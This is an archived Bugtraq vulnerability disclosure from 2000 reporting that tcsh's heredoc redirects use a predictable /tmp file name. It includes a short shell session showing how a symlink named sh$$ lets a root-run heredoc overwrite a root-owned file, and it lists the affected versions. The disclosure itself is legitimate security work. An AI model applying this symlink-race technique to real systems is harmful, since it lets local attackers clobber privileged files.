5655168 2000-10-29 04:43 +0000  /48 rader/ proton <proton@ENERGYMECH.NET>
Sänt av: joel@lysator.liu.se
Importerad: 2000-10-30  08:42  av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: proton@ENERGYMECH.NET
Mottagare: Bugtraq (import) <13499>
Ärende: tcsh: unsafe tempfile in << redirects
------------------------------------------------------------
From: proton <proton@ENERGYMECH.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <39FBAAF7.D4F258A4@energymech.net>

PROBLEM:

/tmp# echo 'hello world' > rootfile
/tmp# chmod 600 rootfile
/tmp# ln -s rootfile sh$$
/tmp# chown -h 666.666 sh$$
/tmp# ls -l rootfile sh$$
-rw-------   1 root     root           12 Oct 29 03:55 rootfile
lrwxrwxrwx   1 666      666             8 Oct 29 03:56 sh12660 ->
rootfile
/tmp# cat <<BAR
? FOO
? BAR
FOO
o world
/tmp# ls -l rootfile sh$$
/bin/ls: sh12660: No such file or directory
-rw-------   1 root     root           12 Oct 29 03:56 rootfile
/tmp# cat rootfile
FOO
o world
/tmp#

VULNERABLE VERSIONS:

6.07.02 (Astron) 1996-10-27
6.08.00 (Astron) 1998-10-02
6.09.00 (Astron) 1999-08-16 (latest)

(no other versions tested)

FIX:

make sure root (and other sensitive user accounts) doesnt have any
predictable jobs (cron, ~/.cshrc, ...) that uses tcsh AND `<<'
redirects.

patch the source somehow..
(available at ftp://ftp.astron.com/pub/tcsh/ )


/proton
(5655168) ------------------------------------------